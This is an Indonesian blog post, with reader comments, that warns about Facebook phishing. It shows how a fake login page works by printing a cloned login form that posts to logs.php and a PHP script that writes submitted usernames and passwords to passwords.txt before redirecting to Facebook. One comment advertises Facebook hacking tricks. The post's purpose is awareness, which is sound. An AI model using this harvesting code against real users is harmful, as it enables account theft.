Bahaya Phising dan Fake Login Facebook
Beberapa bulan terakhir, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti yahoo messenger, maupun dari pesan dari contact list facebook sendiri.
Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng-klik link yang akan membawa mereka keluar dari Facebook.
Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.
Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-click link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.
Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.
Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menaruh box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.
Bagaimana kita tahu kalau itu fake login ?
Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook menggunakan url https://login.facebook.com/login.php
Web phising dengan fake login
Tampilan utama Web phising dengan fake login menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.
<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”><input type=”hidden” name=”charset_test”
value=”€,´,€,´,?,?,?” /><input type=”hidden” id=”locale”
name=”locale” value=”en_US” /><table cellpadding=”0″ cellspacing=”0″><tr><td
class=”login_form_label_field login_form_label_remember”><label><input
type=”checkbox” name=”persistent” value=”1″ />Remember Me</label></td><td
class=”login_form_label_field”><a href=”http://www.facebook.com/reset.php”
rel=”nofollow”>Forgot your password?</a></td><td class=”login_form_last_field
login_form_label_field”></td></tr><tr><td><input type=”text” class=”inputtext”
id=”email” name=”email” value=”" /></td><td><input type=”password”
class=”inputpassword” id=”pass” name=”pass” value=”" /><input type=”text”
class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" /></td><td class=”login_form_last_field”><div
class=”UILinkButton”><input type=”submit” class=”UILinkButton_A” value=”Login”
/><div class=”UILinkButton_RW”><div
class=”UILinkButton_R”></div></div></div></td></tr></table><input type=”hidden”
name=”charset_test” value=”€,´,€,´,?,?,?” /></form>
Lihat code yang di cetak tebal tersebut, code asli dari facebook adalah
<form id=”login_form”
action=”https://login.facebook.com/login.php?login_attempt=1″ method=”POST”>
Yang tercetak tebal, yaitu :
<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”>
adalah pengisian dari form tersebut kita akan diarahkan ke logs.php.
Sedangkan isis dari logs.php adalah pencatatan dari pengisian username dan password tersebut.
<?php
header(“Location:http://www.facebook.com/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Pengisisan di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..
Bahaya kan……
Semoga menjadi pencerahan bagi teman-teman yang beberapa hari lalu menanyakan hal ini padaku lewat YM.
Similiar Post
- FORM HTML
- Jangan Grab Website Secara Langsung !
- Update Status Facebook via Blackberry, Blueberry, Telepon Umum, Wartel, Kantor Pos, HP Pinjaman, Warnet, Hati
- Chatting Facebook with Pidgin IM
- Install Wordpress 2.7 di Hosting dan Local PC (XAMPP)
- Setting Internet Selular
- Instal Wordpress dengan Domain Gratis dan Hosting Gratis
- Install & Setting TDO Mini Forms (tdomf) Wordpress Plugin untuk Iklan Baris
- Telkomsel Chatbox Gagal Login Yahoo Messenger
- MicroEmulator & Opera Mini Mod
Popular Post
- HP Modem Smart Haier C700 dan ZTE C261, Internet Gratis 90 hari
- Mempercepat Akses Internet Smart Telecom
- Internet Gratis Indosat dan IM3
- Internet Unlimited Smart Jump dari Smart Telecom
- Mempercepat Akses Internet dengan cFosSpeed
- Internet Gratis PRO-XL, Your-Freedom & cFosSpeed
- Uji Coba Fitur BREW HP Haier C700 dan ZTE C261
- HP 3G Modem & Internet Akses CDMA dari Smart Telecom
- Install dan Setting Your Freedom
- Opera Mini Mod v.3.10
Random Post
- Setting Internet Selular
- Upgrade Wordpress 2.8.5: Hardening Release, Sambil Tunggu WordPress 2.9
- Domain settings – URL Forwarding
- Website Tutorial : addon Domains
- Delivery Scam from Tagged Contact
- Update Pagerank Minor – Gembira atau Sedih ?
- Install & Setting TDO Mini Forms (tdomf) Wordpress Plugin untuk Iklan Baris
- Java Phone
- KODE RAHASIA PONSEL
- Internet Gratis 100 hari dengan Windows Phone EVDO N75 dari Smart
Comments
8 Comments on Bahaya Phising dan Fake Login Facebook
-
kank_ripay
on Sun, 8th Nov 2009 6:22 pm
-
Budiarno
on Mon, 9th Nov 2009 2:31 pm
-
syadiashare
on Thu, 12th Nov 2009 3:51 pm
-
Pembuat Theme WordPress
on Mon, 16th Nov 2009 8:49 pm
-
dPrince Of Smart
on Tue, 5th Jan 2010 2:33 am
-
dPrince Of Smart
on Thu, 7th Jan 2010 10:34 pm
saya baru mengenal fake login facebook ketika saya berada di suau warnet dekat kosan saya, pemilik rental warnet ternyata orang nya iseng. memasang fake login ini… sungguh saya jadi males ke warnet itu… untung saya lihat lagi alamatna… jadi.. hati2 lah dalam melakukan login facebook.. lihat dulu, apakah sudah benar atau tidak alamatnya yaitu http://www.facebook.com sebelum melakukan login
kank_ripay´s last blog ..Perbaikan Website SMAN 1 Ciawigebang ![]()
teman saya juga telah menjadi korban phising seperti ini, padahal browser Mozilla yg dia pake sempat memperingatkannya bahwa website yg dia kunjugi itu ada malwarenya. alhasil, akun fb nya pun jatuh ke tangan orang iseng.
satunya lagi, teman saya yg hobby main poker juga kayaknya terserang tangan jahil, tapi dengan cara yg berbeda hanya gara-gara dia main di warnet dan punya CHIPS Zynga ber MM….
Budiarno´s last blog ..Flexinet Pake Modem USB CDMA (PDF) ![]()
Info na mantap sekali om.. , berkunjung di sore hari nih ……..
syadiashare´s last blog ..Download Macromedia Dreamweaver 8 ![]()
Ada cara hacking facebook level 3, lebih dari sekedar fake.
Trik Rahasia HAcking Facebook dan twitter …..bisa untuk teknik marketing
Mantaf ada di webqu buat referensi…Blog Lebih Cepat Dengan Cache Database Dan Cache Widget
Nice posting….
Bicara tentang pishing memang aga sedikit gerah… tapi terkadang semua yang bersifat negatif tetap saja akan ada hikmahnya, manfaatnya…
baca kelanjutannya di http://bumikupijak.com/index.php?option=com_content&task=view&id=318&Itemid=2
Saya masukkan baclinknya yah…
Oh ya.. minta pendapatnya ya di komentar posting sy disini… sy tunggu…
http://bumikupijak.com/index.php?option=com_content&task=view&id=318
Trmksh, maju terus..
dPrince Of Smart´s last blog ..Pentingkah Hak Cipta? ![]()
ariefew Reply:
January 8th, 2010 at 12:59 pm
aku sudah 2 kali coba comment di sana gak bisa masuk…..
kujawab aja disini mas….
Kalau kulihat artikel anda tersebut ada 2 masalah yang berbeda yang tdk bisa di ulas menjadi satu.
Pertama
Topik tentang Phising dan Fake Login Facebook
aku mbuat tulisan tentang topik tersebut dikarenakan ada beberapa member forum temanku menanyakan/ mengalami “hack’ facebook. Berkali2 ku jelaskan bahwa website sebesar Fb tdk akan bisa di hack dengan mudah. Jebolnya user dan password FB kita kemungkinan keteledoran kita sendiri yg tdk memperhatikan url yg sesungguhnya. Phising dan Fake Login Facebook bisa lewat mail, atau link dan komentar2 di wall FB sendiri. Penggunaan short url juga menunjang terjadinya Phising dan Fake Login Facebook tersebut.
Kedua
Masalah hak cipta
konten/script/template/widget sangat penting menampilkan link asalnya (asal dari konten/script/template/widget di suatu url) bukan ke url induk atau link si pembuat.
Jika kita menemukan suatu script/template/widget di internet kita akan tahu asal usulnya, dan aman kah jika dipakai?
Selain itu script/template/widget pasti sering mengalami perubahan atau revisi, jika terjadi perubahan pasti sangat mudah untuk menelusurinya kembali.
misal kurs yg ada kubuat, tdk akan bertahan utk selamanya, karena disitu kugunakan teknik graber utk pengambilannya. Jika terjadi perubahan di web asal pasti script yg kugunakan ikut berubah
Tell me what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!




Webhosting Murah Indonesia
ariefew
Reply:
November 13th, 2009 at 4:15 am
hei…. kok tiba2 muncul di sini… ada apa ini… hehehehhe
Reply